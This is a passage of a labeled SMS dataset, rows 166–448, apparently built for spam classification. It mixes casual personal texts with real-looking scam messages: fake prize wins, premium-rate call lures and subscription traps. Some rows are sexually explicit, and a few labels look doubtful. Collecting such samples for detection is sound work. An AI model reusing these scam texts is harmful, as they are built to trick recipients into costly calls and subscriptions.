166 | Spam SplashMobile: Choose from 1000s of gr8 tones each wk! This is a subscrition service with weekly tones costing 300p. U have one credit - kick back and ENJOY
167 | Ham Company is very good.environment is terrific and food is really nice:)
168 | Ham Arun can u transfr me d amt
169 | Ham Where to get those?
170 | Ham I dont thnk its a wrong calling between us
171 | Spam Dear Matthew please call 09063440451 from a landline, your complimentary 4*Lux Tenerife holiday or £1000 CASH await collection. ppm150 SAE T&Cs Box334 SK38XH.
172 | Spam Please call our customer service representative on 0800 169 6031 between 10am-9pm as you have WON a guaranteed £1000 cash or £5000 prize!
173 | Spam Cashbin.co.uk (Get lots of cash this weekend!) www.cashbin.co.uk Dear Welcome to the weekend We have got our biggest and best EVER cash give away!! These..
174 | Spam Sunshine Quiz! Win a super Sony DVD recorder if you canname the capital of Australia? Text MQUIZ to 82277. B
175 | Ham Mmmmmmm *snuggles into you* ...*deep contented sigh* ... *whispers* ... I fucking love you so much I can barely stand it ...
176 | Spam Wan2 win a Meet+Greet with Westlife 4 U or a m8? They are currently on what tour? 1)Unbreakable, 2)Untamed, 3)Unkempt. Text 1,2 or 3 to 83049. Cost 50p +std text
177 | Spam U can WIN £100 of Music Gift Vouchers every week starting NOW Txt the word DRAW to 87066 TsCs www.Idew.com SkillGame, 1Winaweek, age16. 150ppermessSubscription
178 | Ham We have sent JD for Customer Service cum Accounts Executive to ur mail id, For details contact us
179 | Spam tells u 2 call 09066358152 to claim £5000 prize. U have 2 enter all ur mobile & personal details @ the prompts. Careful!
180 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094599
181 | Ham Am on the uworld site. Am i buying the qbank only or am i buying it with the self assessment also?
182 | Ham Okie
183 | Ham Dai <#> naal eruku.
184 | Spam FREE GAME. Get Rayman Golf 4 FREE from the O2 Games Arcade. 1st get UR games settings. Reply POST, then save & activ8. Press 0 key for Arcade. Termsapply
185 | Spam YOU HAVE WON! As a valued Vodafone customer our computer has picked YOU to win a £150 prize. To collect is easy. Just call 09061743386
186 | Ham You've already got a flaky parent. It'snot supposed to be the child's job to support the parent...not until they're The Ride age anyway. I'm supposed to be there to support you. And now i've hurt you.
187 | Ham Easy mate, * guess the quick drink was bit ambitious.
188 | Spam Save money on wedding lingerie at www.bridal.petticoatdreams.co.uk Choose from a superb selection with national delivery. Brought to you by WeddingFriend
189 | Ham U so lousy, run already come back then half dead... Hee...
190 | Ham Yup song bro. No creative. Neva test quality. He said check review online.
191 | Spam Do you want 750 anytime any network mins 150 text and a NEW VIDEO phone for only five pounds per week call 08002888812 or reply for delivery tomorrow
192 | Ham Petey boy whereare you me and all your friendsare in theKingshead come down if you canlove Nic
193 | Spam * FREE* POLYPHONIC RINGTONE Text SUPER to 87131 to get your FREE POLY TONE of the week now! 16 SN PoBox202 NR31 7ZS subscription 450pw
194 | Spam The current leading bid is 151. To pause this auction send OUT. Customer Care: 08718726270
195 | Spam Ever thought about living a good life with a perfect partner? Just txt back NAME and AGE to join the mobile community. (100p/SMS)
196 | Ham "Beautiful Truth against Gravity.. Read carefully: ""Our heart feels light when someone is in it.. But it feels very heavy when someone leaves it.."" GOODMORNING"
197 | Spam You will recieve your tone within the next 24hrs. For Terms and conditions please see Channel U Teletext Pg 750
198 | Spam Urgent Urgent! We have 800 FREE flights to Europe to give away, call B4 10th Sept & take a friend 4 FREE. Call now to claim on 09050000555. BA128NNFWFLY150ppm
199 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update VCo FREE on 08002986906
200 | Ham "Feb <#> is ""I LOVE U"" day. Send dis to all ur ""VALUED FRNDS"" evn me. If 3 comes back u'll gt married d person u luv! If u ignore dis u will lose ur luv 4 Evr"
201 | Ham Oh ho. Is this the first time u use these type of words
202 | Spam Ur balance is now £600. Next question: Complete the landmark, Big, A. Bob, B. Barry or C. Ben ?. Text A, B or C to 83738. Good luck!
203 | Ham I cant pick the phone right now. Pls send a message
204 | Spam Bored housewives! Chat n date now! 0871750.77.11! BT-national rate 10p/min only from landlines!
205 | Ham <#> in mca. But not conform.
206 | Ham The greatest test of courage on earth is to bear defeat without losing heart....gn tc
207 | Ham That means you got an A in epi, she.s fine. She.s here now.
208 | Ham K ill drink.pa then what doing. I need srs model pls send it to my mail id pa.
209 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
210 | Spam This is the 2nd time we have tried 2 contact u. U have won the 750 Pound prize. 2 claim is easy, call 08712101358 NOW! Only 10p per min. BT-national-rate
211 | Spam For taking part in our mobile survey yesterday! You can now have 500 texts 2 use however you wish. 2 get txts just send TXT to 80160 T&C www.txt43.com 1.50p
212 | Ham Sorry i'm not free...
213 | Spam Get your garden ready for summer with a FREE selection of summer bulbs and seeds worth £33:50 only with The Scotsman this Saturday. To stop go2 notxt.co.uk
214 | Spam You have 1 new message. Please call 08712400200.
215 | Spam RT-KIng Pro Video Club>> Need help? info@ringtoneking.co.uk or call 08701237397 You must be 16+ Club credits redeemable at www.ringtoneking.co.uk! Enjoy!
216 | Ham Jay wants to work out first, how's 4 sound?
217 | Spam FreeMsg: Txt: CALL to No: 86888 & claim your reward of 3 hours talk time to use from your phone now! Subscribe6GBP/mnth inc 3hrs 16 stop?txtStop
218 | Ham Oh ok..
219 | Spam PRIVATE! Your 2004 Account Statement for 078498****7 shows 786 unredeemed Bonus Points. To claim call 08719180219 Identifier Code: 45239 Expires 06.05.05
220 | Spam CDs 4u: Congratulations ur awarded £500 of CD gift vouchers or £125 gift guaranteed & Freeentry 2 £100 wkly draw xt MUSIC to 87066 TnCs www.ldew.com1win150ppmx3age16
221 | Ham Dude u knw also telugu..thts gud..k, gud nyt..
222 | Spam Double Mins & 1000 txts on Orange tariffs. Latest Motorola, SonyEricsson & Nokia with Bluetooth FREE! Call MobileUpd8 on 08000839402 or call2optout/HF8
223 | Spam FreeMsg Hey U, i just got 1 of these video/pic fones, reply WILD to this txt & ill send U my pics, hurry up Im so bored at work xxx (18 150p/rcvd STOP2stop)
224 | Spam Block Breaker now comes in deluxe format with new features and great graphics from T-Mobile. Buy for just £5 by replying GET BBDELUXE and take the challenge
225 | Ham Yar lor... How u noe? U used dat route too?
226 | Spam Latest News! Police station toilet stolen, cops have nothing to go on!
227 | Spam FREE NOKIA Or Motorola with upto 12mths 1/2price linerental, 500 FREE x-net mins&100txt/mth FREE B'tooth*. Call Mobileupd8 on 08001950382 or call 2optout/D3WV
228 | Spam Hi its LUCY Hubby at meetins all day Fri & I will B alone at hotel U fancy cumin over? Pls leave msg 2day 09099726395 Lucy x Calls£1/minMobsmoreLKPOBOX177HP51FL
229 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days.
230 | Ham Sorry, I'll call later in meeting.
231 | Ham K...k:)why cant you come here and search job:)
232 | Spam FREE>Ringtone! Reply REAL or POLY eg REAL1 1. PushButton 2. DontCha 3. BabyGoodbye 4. GoldDigger 5. WeBeBurnin 1st tone FREE and 6 more when u join for £3/wk
233 | Spam Hungry gay guys feeling hungry and up 4 it, now. Call 08718730555 just 10p/min. To stop texts call 08712460324 (10p/min)
234 | Ham How are you, my Love ? Are you with your brother ? Time to talk english with him ? *grins* Say : Hey Muhommad, Penny says hello from across the sea
235 | Spam wamma get laid?want real doggin locations sent direct to your mobile? join the UKs largest dogging network. txt dogs to 69696 now!nyt. ec2a. 3lp £1.50/msg.
236 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18
237 | Ham Shant disturb u anymore... Jia you...
238 | Spam Want 2 get laid tonight? Want real Dogging locations sent direct 2 ur mob? Join the UK's largest Dogging Network bt Txting GRAVEL to 69888! Nt. ec2a. 31p.msg@150p
239 | Spam Auction round 4. The highest bid is now £54. Next maximum bid is £71. To bid, send BIDS e. g. 10 (to bid £10) to 83383. Good luck.
240 | Spam XMAS Prize draws! We are trying to contact U. Todays draw shows that you have won a £2000 prize GUARANTEED. Call 09058094565 from land line. Valid 12hrs only
241 | Spam This message is brought to you by GMW Ltd. and is not connected to the
242 | Ham Hello! Good week? Fancy a drink or something later?
243 | Ham :)
244 | Ham Babe ! What are you doing ? Where are you ? Who are you talking to ? Do you think of me ? Are you being a good boy? Are you missing me? Do you love me ?
245 | Ham OH FUCK. JUSWOKE UP IN A BED ON A BOATIN THE DOCKS. SLEPT WID 25 YEAR OLD. SPINOUT! GIV U DA GOSSIP L8R. XXX
246 | Ham Sorry * was at the grocers.
247 | Ham How abt making some of the pics bigger?
248 | Ham Its ok..come to my home it vl nice to meet and v can chat..
249 | Ham aathi..where are you dear..
250 | Spam You have won a Nokia 7250i. This is what you get when you win our FREE auction. To take part send Nokia to 86021 now. HG/Suite342/2Lands Row/W1JHL 16+
251 | Ham It wont b until 2.15 as trying 2 sort house out, is that ok?
252 | Spam Thanks for the Vote. Now sing along with the stars with Karaoke on your mobile. For a FREE link just reply with SING now.
253 | Spam I am hot n horny and willing I live local to you - text a reply to hear strt back from me 150p per msg Netcollex LtdHelpDesk: 02085076972 reply Stop to end
254 | Spam I want some cock! My hubby's away, I need a real man 2 satisfy me. Txt WIFE to 89938 for no strings action. (Txt STOP 2 end, txt rec £1.50ea. OTBox 731 LA1 7WS. )
255 | Spam FREE for 1st week! No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+
256 | Spam Summers finally here! Fancy a chat or flirt with sexy singles in yr area? To get MATCHED up just reply SUMMER now. Free 2 Join. OptOut txt STOP Help08714742804
257 | Ham How much it will cost approx . Per month.
258 | Spam todays vodafone numbers ending with 0089(my last four digits) are selected to received a £350 award. If your number matches please call 09063442151 to claim your £350 award
259 | Spam Please call our customer service representative on FREEPHONE 0808 145 4742 between 9am-11pm as you have WON a guaranteed £1000 cash or £5000 prize!
260 | Ham So many people seems to be special at first sight, But only very few will remain special to you till your last sight.. Maintain them till life ends.. Sh!jas
261 | Ham We stopped to get ice cream and will go back after
262 | Ham No da..today also i forgot..
263 | Ham Good morning princess! Have a great day!
264 | Spam Sunshine Quiz Wkly Q! Win a top Sony DVD player if u know which country Liverpool played in mid week? Txt ansr to 82277. £1.50 SP:Tyrone
265 | Spam Your account has been credited with 500 FREE Text Messages. To activate, just txt the word: CREDIT to No: 80488 T&Cs www.80488.biz
266 | Ham K..then come wenever u lik to come and also tel vikky to come by getting free time..:-)
267 | Ham Cant think of anyone with * spare room off * top of my head
268 | Ham There's no point hangin on to mr not right if he's not makin u happy
269 | Ham Yes..he is really great..bhaji told kallis best cricketer after sachin in world:).very tough to get out.
270 | Ham We don call like <#> times oh. No give us hypertension oh.
271 | Spam PRIVATE! Your 2003 Account Statement for 07973788240 shows 800 un-redeemed S. I. M. points. Call 08715203649 Identifier Code: 40533 Expires 31/10/04
272 | Ham Dear,Me at cherthala.in case u r coming cochin pls call bfore u start.i shall also reach accordingly.or tell me which day u r coming.tmorow i am engaged ans its holiday.
273 | Ham Yo, you gonna still be in stock tomorrow/today? I'm trying to get a dubsack
274 | Spam Last chance 2 claim ur £150 worth of discount vouchers-Text YES to 85023 now!SavaMob-member offers mobile T Cs 08717898035. £3.00 Sub. 16 . Remove txt X or STOP
275 | Spam URGENT! We are trying to contact U. Todays draw shows that you have won a £800 prize GUARANTEED. Call 09050001808 from land line. Claim M95. Valid12hrs only
276 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S.I.M. points. Call 08718738001 Identifier Code: 49557 Expires 26/11/04
277 | Ham Havent.
278 | Spam Collect your VALENTINE'S weekend to PARIS inc Flight & Hotel + £200 Prize guaranteed! Text: PARIS to No: 69101. www.rtf.sphosting.com
279 | Ham Hope youre not having too much fun without me!! see u tomorrow love jess x
280 | Spam Final Chance! Claim ur £150 worth of discount vouchers today! Text YES to 85023 now! SavaMob, member offers mobile! T Cs SavaMob POBOX84, M263UZ. £3.00 Subs 16
281 | Ham My drive can only be read. I need to write
282 | Spam Dear U've been invited to XCHAT. This is our final attempt to contact u! Txt CHAT to 86688 150p/MsgrcvdHG/Suite342/2Lands/Row/W1J6HL LDN 18 yrs
283 | Ham Sorry, I'll call later
284 | Ham Nowadays people are notixiquating the laxinorficated opportunity for bambling of entropication.... Have you ever oblisingately opted ur books for the masteriastering amplikater of fidalfication? It is
285 | Ham Ok. No wahala. Just remember that a friend in need ...
286 | Spam UpgrdCentre Orange customer, you may now claim your FREE CAMERA PHONE upgrade for your loyalty. Call now on 0207 153 9153. Offer ends 26th July. T&C's apply. Opt-out available
287 | Ham Am slow in using biola's fne
288 | Ham Watching cartoon, listening music & at eve had to go temple & church.. What about u?
289 | Ham From here after The performance award is calculated every two month.not for current one month period..
290 | Spam Good Luck! Draw takes place 28th Feb 06. Good Luck! For removal send STOP to 87239 customer services 08708034412
291 | Spam Urgent! Please call 09061213237 from landline. £5000 cash or a luxury 4* Canary Islands Holiday await collection. T&Cs SAE PO Box 177. M227XY. 150ppm. 16+
292 | Spam URGENT!! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TC s, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
293 | Spam Urgent UR awarded a complimentary trip to EuroDisinc Trav, Aco&Entry41 Or £1000. To claim txt DIS to 87121 18+6*£1.50(moreFrmMob. ShrAcomOrSglSuplt)10, LS1 3AJ
294 | Ham Wife.how she knew the time of murder exactly
295 | Ham Oooh bed ridden ey? What are YOU thinking of?
296 | Spam Back 2 work 2morro half term over! Can U C me 2nite 4 some sexy passion B4 I have 2 go back? Chat NOW 09099726481 Luv DENA Calls £1/minMobsmoreLKPOBOX177HP51FL
297 | Spam Ur ringtone service has changed! 25 Free credits! Go to club4mobiles.com to choose content now! Stop? txt CLUB STOP to 87070. 150p/wk Club4 PO Box1146 MK45 2WT
298 | Ham Today i'm not workin but not free oso... Gee... Thgt u workin at ur fren's shop ?
299 | Spam Win a £1000 cash prize or a prize worth £5000
300 | Spam PRIVATE! Your 2004 Account Statement for 07742676969 shows 786 unredeemed Bonus Points. To claim call 08719180248 Identifier Code: 45239 Expires
301 | Spam Wanna have a laugh? Try CHIT-CHAT on your mobile now! Logon by txting the word: CHAT and send it to No: 8883 CM PO Box 4217 London W1A 6ZF 16+ 118p/msg rcvd
302 | Spam Today's Offer! Claim ur £150 worth of discount vouchers! Text YES to 85023 now! SavaMob, member offers mobile! T Cs 08717898035. £3.00 Sub. 16 . Unsub reply X
303 | Ham Still work going on:)it is very small house.
304 | Spam money!!! you r a lucky winner ! 2 claim your prize text money 2 88600 over £1million to give away ! ppt150x3+normal text rate box403 w1t1jy
305 | Ham Some of them told accenture is not confirm. Is it true.
306 | Ham I am taking half day leave bec i am not well
307 | Spam 87077: Kick off a new season with 2wks FREE goals & news to ur mobile! Txt ur club name to 87077 eg VILLA to 87077
308 | Ham Good sleep is about rhythm. The person has to establish a rhythm that the body will learn and use. If you want to know more :-)
309 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
310 | Ham Your opinion about me? 1. Over 2. Jada 3. Kusruthi 4. Lovable 5. Silent 6. Spl character 7. Not matured 8. Stylish 9. Simple Pls reply..
311 | Ham Nope thats fine. I might have a nap tho!
312 | Ham Ok u can take me shopping when u get paid =D
313 | Spam Money i have won wining number 946 wot do i do next
314 | Ham Mm feeling sleepy. today itself i shall get that dear
315 | Ham 7 lor... Change 2 suntec... Wat time u coming?
316 | Ham Beautiful tomorrow never comes.. When it comes, it's already TODAY.. In the hunt of beautiful tomorrow don't waste your wonderful TODAY.. GOODMORNING:)
317 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime any networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW
318 | Spam U 447801259231 have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094597
319 | Spam Hello darling how are you today? I would love to have a chat, why dont you tell me what you look like and what you are in to sexy?
320 | Ham Have you finished work yet? :)
321 | Ham I guess you could be as good an excuse as any, lol.
322 | Spam URGENT! Your Mobile number has been awarded with a £2000 prize GUARANTEED. Call 09058094455 from land line. Claim 3030. Valid 12hrs only
323 | Spam We tried to contact you re your reply to our offer of a Video Handset? 750 anytime networks mins? UNLIMITED TEXT? Camcorder? Reply or call 08000930705 NOW
324 | Ham Gokila is talking with you aha:)
325 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712379 between 10am-7pm Cost 10p
326 | Spam "Free Msg: get Gnarls Barkleys ""Crazy"" ringtone TOTALLY FREE just reply GO to this message right now!"
327 | Ham That's good. Lets thank God. Please complete the drug. Have lots of water. And have a beautiful day.
328 | Ham Just sent it. So what type of food do you like?
329 | Spam Talk sexy!! Make new friends or fall in love in the worlds most discreet text dating service. Just text VIP to 83110 and see who you could meet.
330 | Ham Having lunch:)you are not in online?why?
331 | Spam We currently have a message awaiting your collection. To collect your message just call 08718723815.
332 | Spam YOUR CHANCE TO BE ON A REALITY FANTASY SHOW call now = 08707509020 Just 20p per min NTT Ltd, PO Box 1327 Croydon CR9 5WB 0870 is a national = rate call.
333 | Ham Tired. I haven't slept well the past few nights.
334 | Ham Any chance you might have had with me evaporated as soon as you violated my privacy by stealing my phone number from your employer's paperwork. Not cool at all. Please do not contact me again or I wil
335 | Spam Burger King - Wanna play footy at a top stadium? Get 2 Burger King before 1st Sept and go Large or Super with Coca-Cola and walk out a winner
336 | Ham Oops. 4 got that bit.
337 | Ham No message..no responce..what happend?
338 | Ham Dont search love, let love find U. Thats why its called falling in love, bcoz U dont force yourself, U just fall and U know there is smeone to hold U... BSLVYL
339 | Spam Hi babe its Chloe, how r u? I was smashed on saturday night, it was great! How was your weekend? U been missing me? SP visionsms.com Text stop to stop 150p/text
340 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058091854 NOW all will be revealed. PO BOX385 M6 6WU
341 | Spam "You have been specially selected to receive a ""3000 award! Call 08712402050 BEFORE the lines close. Cost 10ppm. 16+. T&Cs apply. AG Promo"
342 | Ham Good afternoon, my love! How goes that day ? I hope maybe you got some leads on a job. I think of you, boytoy and send you a passionate kiss from across the sea
343 | Ham If you don't respond imma assume you're still asleep and imma start calling n shit
344 | Spam WELL DONE! Your 4* Costa Del Sol Holiday or £5000 await collection. Call 09050090044 Now toClaim. SAE, TCs, POBox334, Stockport, SK38xh, Cost£1.50/pm, Max10mins
345 | Spam Someone U know has asked our dating service 2 contact you! Cant Guess who? CALL 09058097189 NOW all will be revealed. POBox 6, LS15HB 150p
346 | Spam How come it takes so little time for a child who is afraid of the dark to become a teenager who wants to stay out all night?
347 | Spam PRIVATE! Your 2003 Account Statement for shows 800 un-redeemed S. I. M. points. Call 08715203656 Identifier Code: 42049 Expires 26/10/04
348 | Spam SMS. ac JSco: Energy is high, but u may not know where 2channel it. 2day ur leadership skills r strong. Psychic? Reply ANS w/question. End? Reply END JSCO
349 | Spam URGENT! Your mobile No *********** WON a £2,000 Bonus Caller Prize on 02/06/03! This is the 2nd attempt to reach YOU! Call 09066362220 ASAP! BOX97N7QP, 150ppm
350 | Ham U wan 2 haf lunch i'm in da canteen now.
351 | Ham I cant wait for cornwall. Hope tonight isnt too bad as well but its rock night shite. Anyway im going for a kip now have a good night. Speak to you soon.
352 | Spam PRIVATE! Your 2003 Account Statement for 07808247860 shows 800 un-redeemed S. I. M. points. Call 08719899229 Identifier Code: 40411 Expires 06/11/04
353 | Spam New Tones This week include: 1)McFly-All Ab.., 2) Sara Jorge-Shock.. 3) Will Smith-Switch.. To order follow instructions on next message
354 | Spam You are being ripped off! Get your mobile content from www.clubmoby.com call 08717509990 poly/true/Pix/Ringtones/Games six downloads for only 3
355 | Spam This weeks SavaMob member offers are now accessible. Just call 08709501522 for details! SavaMob, POBOX 139, LA3 2WU. Only £1.50/week. SavaMob - offers mobile!
356 | Ham Daddy, shu shu is looking 4 u... U wan me 2 tell him u're not in singapore or wat?
357 | Ham No..few hours before.went to hair cut .
358 | Ham Yes baby! We can study all the positions of the kama sutra ;)
359 | Ham Rose needs water, season needs change, poet needs imagination..My phone needs ur sms and i need ur lovely frndship forever....
360 | Spam 18 days to Euro2004 kickoff! U will be kept informed of all the latest news and results daily. Unsubscribe send GET EURO STOP to 83222.
361 | Ham I think just yourself …Thanks and see you tomo
362 | Spam SIX chances to win CASH! From 100 to 20,000 pounds txt> CSH11 and send to 87575. Cost 150p/day, 6days, 16+ TsandCs apply Reply HL 4 info
363 | Ham All these nice new shirts and the only thing I can wear them to is nudist themed ;_; you in mu?
364 | Ham X2 <#> . Are you going to get that
365 | Ham HI HUN! IM NOT COMIN 2NITE-TELL EVERY1 IM SORRY 4 ME, HOPE U AVA GOODTIME!OLI RANG MELNITE IFINK IT MITE B SORTED,BUT IL EXPLAIN EVERYTHIN ON MON.L8RS.x
366 | Ham Wat makes some people dearer is not just de happiness dat u feel when u meet them but de pain u feel when u miss dem!!!
367 | Spam England v Macedonia - dont miss the goals/team news. Txt ur national team to 87077 eg ENGLAND to 87077 Try:WALES, SCOTLAND 4txt/ú1.20 POBOXox36504W45WQ 16+
368 | Ham Hello, my love! How goes that day ? I wish your well and fine babe and hope that you find some job prospects. I miss you, boytoy ... *a teasing kiss*
369 | Spam Hi 07734396839 IBH Customer Loyalty Offer: The NEW NOKIA6600 Mobile from ONLY £10 at TXTAUCTION!Txt word:START to No:81151 & get Yours Now!4T&
370 | Spam Had your mobile 10 mths? Update to the latest Camera/Video phones for FREE. KEEP UR SAME NUMBER, Get extra free mins/texts. Text YES for a call
371 | Ham U too...
372 | Spam BangBabes Ur order is on the way. U SHOULD receive a Service Msg 2 download UR content. If U do not, GoTo wap. bangb. tv on UR mobile internet/service menu
373 | Ham Thanx. Yup we coming back on sun. Finish dinner going back 2 hotel now. Time flies, we're tog 4 exactly a mth today. Hope we'll haf many more mths to come...
374 | Spam Great NEW Offer - DOUBLE Mins & DOUBLE Txt on best Orange tariffs AND get latest camera phones 4 FREE! Call MobileUpd8 free on 08000839402 NOW! or 2stoptxt T&Cs
375 | Ham "Painful words- ""I thought being Happy was the most toughest thing on Earth... But, the toughest is acting Happy with all unspoken pain inside.."""
376 | Spam Marvel Mobile Play the official Ultimate Spider-man game (£4.50) on ur mobile right now. Text SPIDER to 83338 for the game & we ll send u a FREE 8Ball wallpaper
377 | Ham The affidavit says <#> E Twiggs St, division g, courtroom <#> , <TIME> AM. I'll double check and text you again tomorrow
378 | Ham New Theory: Argument wins d SITUATION, but loses the PERSON. So dont argue with ur friends just.. . . . kick them & say, I'm always correct.!
379 | Ham K, my roommate also wants a dubsack and another friend may also want some so plan on bringing extra, I'll tell you when they know for sure
380 | Spam Had your mobile 11 months or more? U R entitled to Update to the latest colour mobiles with camera for Free! Call The Mobile Update Co FREE on 08002986030
381 | Spam thesmszone.com lets you send free anonymous and masked messages..im sending this message from there..do you see the potential for abuse???
382 | Ham Yar lor he wan 2 go c horse racing today mah, so eat earlier lor. I ate chicken rice. U?
383 | Ham Lol enjoy role playing much?
384 | Ham Pls speak to that customer machan.
385 | Spam TheMob> Check out our newest selection of content, Games, Tones, Gossip, babes and sport, Keep your mobile fit and funky text WAP to 82468
386 | Spam "SMS. ac sun0819 posts HELLO:""You seem cool, wanted to say hi. HI!!!"" Stop? Send STOP to 62468"
387 | Spam December only! Had your mobile 11mths+? You are entitled to update to the latest colour camera mobile for Free! Call The Mobile Update Co FREE on 08002986906
388 | Ham Faith makes things possible,Hope makes things work,Love makes things beautiful,May you have all three this Christmas!Merry Christmas!
389 | Ham Thank you. I like you as well...
390 | Ham I need... Coz i never go before
391 | Spam 500 New Mobiles from 2004, MUST GO! Txt: NOKIA to No: 89545 & collect yours today!From ONLY £1 www.4-tc.biz 2optout 087187262701.50gbp/mtmsg18 TXTAUCTION
392 | Ham Mm that time you dont like fun
393 | Spam 1000's flirting NOW! Txt GIRL or BLOKE & ur NAME & AGE, eg GIRL ZOE 18 to 8007 to join and get chatting!
394 | Ham Haha awesome, I've been to 4u a couple times. Who all's coming?
395 | Ham Just woke up. Yeesh its late. But I didn't fall asleep til <#> am :/
396 | Spam U have a secret admirer who is looking 2 make contact with U-find out who they R*reveal who thinks UR so special-call on 09058094565
397 | Ham Did he say how fantastic I am by any chance, or anything need a bigger life lift as losing the will 2 live, do you think I would be the first person 2 die from N V Q?
398 | Spam "FREE RING TONE just text ""POLYS"" to 87131. Then every week get a new tone. 0870737910216yrs only £1.50/wk."
399 | Ham Ok can...
400 | Spam Get ur 1st RINGTONE FREE NOW! Reply to this msg with TONE. Gr8 TOP 20 tones to your phone every week just £1.50 per wk 2 opt out send STOP 08452810071 16
401 | Spam Get a brand new mobile phone by being an agent of The Mob! Plus loads more goodies! For more info just text MAT to 87021.
402 | Ham I sent them. Do you like?
403 | Ham Good. do you think you could send me some pix? I would love to see your top and bottom...
404 | Ham I accidentally brought em home in the box
405 | Spam Camera - You are awarded a SiPix Digital Camera! call 09061221066 fromm landline. Delivery within 28 days.
406 | Ham S....s...india going to draw the series after many years in south african soil..
407 | Spam IMPORTANT MESSAGE. This is a final contact attempt. You have important messages waiting out our customer claims dept. Expires 13/4/04. Call 08717507382 NOW!
408 | Ham You'd like that wouldn't you? Jerk!
409 | Ham How long does it take to get it.
410 | Spam Our records indicate u maybe entitled to 5000 pounds in compensation for the Accident you had. To claim 4 free reply with CLAIM to this msg. 2 stop txt STOP
411 | Ham Oh:)as usual vijay film or its different?
412 | Ham Tmr then ü brin lar... Aiya later i come n c lar... Mayb ü neva set properly ü got da help sheet wif ü...
413 | Spam Loan for any purpose £500 - £75,000. Homeowners + Tenants welcome. Have you been previously refused? We can still help. Call Free 0800 1956669 or text back 'help'
414 | Ham So li hai... Me bored now da lecturer repeating last weeks stuff waste time...
415 | Spam cmon babe, make me horny, *turn* me on! Txt me your fantasy now babe -) Im hot, sticky and need you now. All replies cost £1.50. 2 cancel send STOP
416 | Spam Hope you enjoyed your new content. text stop to 61610 to unsubscribe. help:08712400602450p Provided by tones2you.co.uk
417 | Ham Oh great. I.ll disturb him more so that we can talk.
418 | Ham I have 2 sleeping bags, 1 blanket and paper and phone details. Anything else?
419 | Spam URGENT! You have won a 1 week FREE membership in our £100,000 Prize Jackpot! Txt the word: CLAIM to No: 81010 T&C www.dbuk.net LCCLTD POBOX 4403LDNW1A7RW18
420 | Ham Great! So what attracts you to the brothas?
421 | Ham My supervisor find 4 me one lor i thk his students. I havent ask her yet. Tell u aft i ask her.
422 | Spam FREE for 1st week! No1 Nokia tone 4 ur mob every week just txt NOKIA to 8007 Get txting and tell ur mates www.getzed.co.uk POBox 36504 W45WQ norm150p/tone 16+
423 | Ham O we cant see if we can join denis and mina? Or does denis want alone time
424 | Spam Can U get 2 phone NOW? I wanna chat 2 set up meet Call me NOW on 09096102316 U can cum here 2moro Luv JANE xx Calls£1/minmoremobsEMSPOBox45PO139WA
425 | Ham Jordan got voted out last nite!
426 | Ham Tomarrow i want to got to court. At <DECIMAL> . So you come to bus stand at 9.
427 | Ham I dont thnk its a wrong calling between us
428 | Spam Congratulations - Thanks to a good friend U have WON the £2,000 Xmas prize. 2 claim is easy, just call 08712103738 NOW! Only 10p per minute. BT-national-rate
429 | Ham I could ask carlos if we could get more if anybody else can chip in
430 | Ham You have to pls make a note of all she.s exposed to. Also find out from her school if anyone else was vomiting. Is there a dog or cat in the house? Let me know later.
431 | Spam important information 4 orange user 0789xxxxxxx. today is your lucky day!2find out why log onto http://www.urawinner.com THERE'S A FANTASTIC SURPRISE AWAITING YOU!
432 | Spam New TEXTBUDDY Chat 2 horny guys in ur area 4 just 25p Free 2 receive Search postcode or at gaytextbuddy.com. TXT ONE name to 89693
433 | Spam Guess what! Somebody you know secretly fancies you! Wanna find out who it is? Give us a call on 09065394514 From Landline DATEBox1282EssexCM61XN 150p/min 18
434 | Ham I'm home...
435 | Spam GSOH? Good with SPAM the ladies?U could b a male gigolo? 2 join the uk's fastest growing mens club reply ONCALL. mjzgroup. 08714342399.2stop reply STOP. msg@£1.50rcvd
436 | Spam Want to funk up ur fone with a weekly new tone reply TONES2U 2 this text. www.ringtones.co.uk, the original n best. Tones 3GBP network operator rates apply
437 | Spam URGENT! Last weekend's draw shows that you have won £1000 cash or a Spanish holiday! CALL NOW 09050000332 to claim. T&C: RSTM, SW7 3SS. 150ppm
438 | Ham My Parents, My Kidz, My Friends n My Colleagues. All screaming.. SURPRISE !! and I was waiting on the sofa.. ... ..... ' NAKED...!
439 | Spam You have WON a guaranteed £1000 cash or a £2000 prize. To claim yr prize call our customer service representative on 08714712412 between 10am-7pm Cost 10p
440 | Spam Had your mobile 11mths ? Update for FREE to Oranges latest colour camera mobiles & unlimited weekend calls. Call Mobile Upd8 on freefone 08000839402 or 2StopTx
441 | Spam Reply to win £100 weekly! Where will the 2006 FIFA World Cup be held? Send STOP to 87239 to end service
442 | Ham Ok i vl..do u know i got adsense approved..
443 | Spam 88800 and 89034 are premium phone services call 08718711108
444 | Spam Hi this is Amy, we will be sending you a free phone number in a couple of days, which will give you an access to all the adult parties...
445 | Ham How's my loverboy doing ? What does he do that keeps him from coming to his Queen, hmmm ? Doesn't he ache to speak to me ? Miss me desparately ?
446 | Spam Your credits have been topped up for http://www.bubbletext.com Your renewal Pin is tgxxrz
447 | Ham ALSO TELL HIM I SAID HAPPY BIRTHDAY
448 | Ham Cheers for the card ... Is it that time of year already?
